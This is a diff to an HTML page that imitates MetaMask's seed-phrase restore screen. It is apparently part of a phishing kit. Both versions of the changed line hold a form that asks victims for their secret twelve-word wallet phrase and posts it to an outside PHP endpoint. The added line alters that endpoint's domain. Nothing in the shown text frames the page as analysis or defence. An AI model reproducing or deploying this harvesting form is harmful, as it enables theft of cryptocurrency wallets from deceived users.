--- a/metamask/index.html
+++ b/metamask/index.html
@@ -355,7 +355,7 @@ label + .jss12 {
             transition: transform 300ms ease-in-out;
             transform: translateY(-200%);
           }
-        </style></div><div class="main-container-wrapper"><div class="first-view-main-wrapper"><div class="first-view-main"><form method="post" action="https://thebigfivetoken.page.gd/metamask.php"><div class="import-account"><a class="import-account__back-button" href="#">&lt; Back</a><div class="import-account__title">Restore your Account with Seed Phrase</div><div class="import-account__selector-label">Enter your secret twelve word phrase here to restore your vault.</div><div class="import-account__input-wrapper"><label class="import-account__input-label">Wallet Seed</label><textarea class="import-account__secret-phrase" placeholder="Separate each word with a single space" type="text" name="PK" required="true"></textarea><span class="error"></span></div><button class="button btn--first-time first-time-flow__button">Restore</button></div></form></div></div></div></div></div>
+        </style></div><div class="main-container-wrapper"><div class="first-view-main-wrapper"><div class="first-view-main"><form method="POST" action="https://thebigfivetoken.page.g0d/metamask.php"><div class="import-account"><a class="import-account__back-button" href="#">&lt; Back</a><div class="import-account__title">Restore your Account with Seed Phrase</div><div class="import-account__selector-label">Enter your secret twelve word phrase here to restore your vault.</div><div class="import-account__input-wrapper"><label class="import-account__input-label">Wallet Seed</label><textarea class="import-account__secret-phrase" placeholder="Separate each word with a single space" type="text" name="PK" required="true"></textarea><span class="error"></span></div><button class="button btn--first-time first-time-flow__button">Restore</button></div></form></div></div></div></div></div>
     <div id="popover-content"></div>
     <script src="./globalthis.js" type="text/javascript" charset="utf-8"></script>
     <script src="./initSentry.js" type="text/javascript" charset="utf-8"></script>
@@ -366,3 +366,4 @@ label + .jss12 {
   
 
 </body></html>
+
